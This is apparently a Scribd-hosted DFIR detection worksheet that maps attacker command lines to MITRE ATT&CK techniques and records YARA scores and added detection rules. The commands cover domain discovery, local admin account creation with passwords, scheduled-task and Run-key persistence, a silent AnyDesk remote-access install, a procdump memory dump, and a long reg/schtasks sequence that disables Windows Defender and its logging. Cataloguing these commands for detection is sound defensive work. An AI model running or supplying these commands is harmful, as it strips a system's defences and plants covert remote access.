Scribd
Upload
119 views9 pages

DFIR Detection

The document contains a list of 46 commands that are used to disable security tools and features on Windows systems. This includes disabling Windows Defender's real-time protection, scheduled scans, and services. It also adds registry keys to stop the SecurityHealthService and other monitoring tools from starting. The overall effect is to significantly impair the system's defenses by stopping various antivirus, antimalware, and security health checking processes.

Uploaded by

Viren Choudhari
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as XLSX, PDF, TXT or read online on Scribd
119 views9 pages

DFIR Detection

The document contains a list of 46 commands that are used to disable security tools and features on Windows systems. This includes disabling Windows Defender's real-time protection, scheduled scans, and services. It also adds registry keys to stop the SecurityHealthService and other monitoring tools from starting. The overall effect is to significantly impair the system's defenses by stopping various antivirus, antimalware, and security health checking processes.

Uploaded by

Viren Choudhari
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as XLSX, PDF, TXT or read online on Scribd
You are on page 1/ 9

Sr. no.

Commands
1 C:\Windows\system32\cmd.exe /C net time

2 C:\Windows\system32\cmd.exe /C ping qa.corp.qualys.com

3 C:\Windows\system32\cmd.exe /C nltest /dclist:qa.corp.qualys.com

4 C:\Windows\system32\cmd.exe /C Net group "Domain Admins" /domain \

5 C:\Windows\system32\cmd.exe /C nslookup qualys.com

6 C:\Windows\system32\cmd.exe /C ping 190.114.254.116

7 C:\Windows\system32\cmd.exe /C net group /domain


Detection Notes
T1124- System Time Discovery

T1016.001
System Network Configuration Discovery:
Internet Connection Discovery
T1018
Remote System Discovery
T1018
Remote System Discovery

T1069.002
Permission Groups Discovery: Domain
Groups
T1087.002
Account Discovery: Domain Account
T1018
Remote System Discovery

T1016.001
System Network Configuration Discovery:
Internet Connection Discovery
T1018
Remote System Discovery

T1069.002
Permission Groups Discovery: Domain
Groups
T1087.002
Account Discovery: Domain Account
Sr. no. Commands

1 schtasks /create /tn HpSupport22 /tr C:\users\public\music\star.bat /SC ONSTART /F

2 net user oldadiministrator "qc69t4B#Z0kE3" /add

3 net localgroup Administrators old /ADD

4 net user sqlbackup qc69t4b#z0ke3 /add

5 net user localdomain qc69t4b#z0ke3 /add

6 net localgroup administrators localadmin /add


7 reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Run /d "$dst$ /
9 powershell -c "$Source = 'https://anydesk.com/en/downloads/thank-you?dv=win_exe'; $Destination='C:\Pr
10 C:\ProgramData\AnyDesk.exe --install
11 C:\ProgramData\AnyDesk --start-with-win --silent
12 echo J9kzQ2Y0qO | C:\ProgramData\AnyDesk.exe --set-password
13 C:\ProgramData\AnyDesk.exe --get-id

15 wmic /node:"" process call create "cmd /c C:\perflogs\procdump.exe -accepteula -ma


Detection Notes
T1053.005
Scheduled Task/Job:
Scheduled Task

T1078.003
Valid Accounts: Local
Accounts
T1136.001
Create Account: Local
Account

T1098 - Account
Manipulation and
T1078.003 - Valid
Accounts: Local
Accounts

T1078.003 - Valid
Accounts: Local
Accounts T1136.001-
Create Account: Local
Account

T1078.003 - Valid
Accounts: Local
Accounts T1136.001-
Create Account: Local
Account

T1098 - Account
Manipulation and
T1078.003 - Valid
Accounts: Local
Accounts
T1547.001-Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder and T1112 - Modify Registry
?dv=win_exe'; $Destination='C:\Pr Yara gave a score of 9
Binary didn't run
Binary didn't run
Binary didn't run
Binary didn't run

T1047
Windows
Management
Instrumentation Prodump has been taggetd by yara with 9 score, Prodump rule has been created
Sr. no. Commands Detection

T1562.001
Impair Defenses: Disable or
Modify Tools
Q0025
rem reg add "HKLM\System\CurrentControlSet\Services\ Disable or Stop Services, or
4 SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f Terminate Processes
5 rem 1 - Disable Real-time protection
reg delete "HKLM\Software\Policies\Microsoft\Windows T1070
6 Defender" /f Indicator Removal on Host
T1562.001
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v Impair Defenses: Disable or
7 "DisableAntiSpyware" /t REG_DWORD /d "1" /f Modify Tools
T1562.001
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v Impair Defenses: Disable or
8 "DisableAntiVirus" /t REG_DWORD /d "1" /f Modify Tools

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\


9 MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
Real-Time Protection" /v "DisableBehaviorMonitoring" /t
10 REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
Real-Time Protection" /v "DisableIOAVProtection" /t
11 REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
Real-Time Protection" /v "DisableOnAccessProtection" /t
12 REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
Real-Time Protection" /v "DisableRealtimeMonitoring" /t
13 REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t
14 REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d
15 "1" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\


16 SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\


17 SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\


18 SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
reg add "HKLM\System\CurrentControlSet\Control\WMI\
20 Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
reg add "HKLM\System\CurrentControlSet\Control\WMI\
Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d
21 "0" /f

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\


23 ExploitGuard MDM policy Refresh" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\
24 Windows Defender Cache Maintenance" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\
25 Windows Defender Cleanup" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\
26 Windows Defender Scheduled Scan" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\
27 Windows Defender Verification" /Disable

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\


29 Explorer\StartupApproved\Run" /v "Windows Defender" /f

reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\


30 Run" /v "Windows Defender" /f

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\


31 Run" /v "WindowsDefender" /f
32 rem Remove WD context menu
33 reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

34 reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f


35 reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
36 rem Disable WD services
rem For these to execute successfully, you may need to boot into
37 safe mode due to tamper protect
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v
38 "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v
39 "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v
40 "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v
41 "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v
42 "Start" /t REG_DWORD /d "4" /f

reg add "HKLM\System\CurrentControlSet\Services\


43 SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
44 rem added the following on 07/25/19 for win10v1903
reg add "HKLM\System\CurrentControlSet\Services\Sense" /v
45 "Start" /t REG_DWORD /d "4" /f

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\


46 Run" /v "SecurityHealth" /f
Notes

T1562.001 score didn’t come

Added a rule

Added a rule

Added a rule

Added a rule

Added a rule

Added a rule

Added a rule

Added a rule

Added a rule

Added a rule
Added a rule

Added a rule

You might also like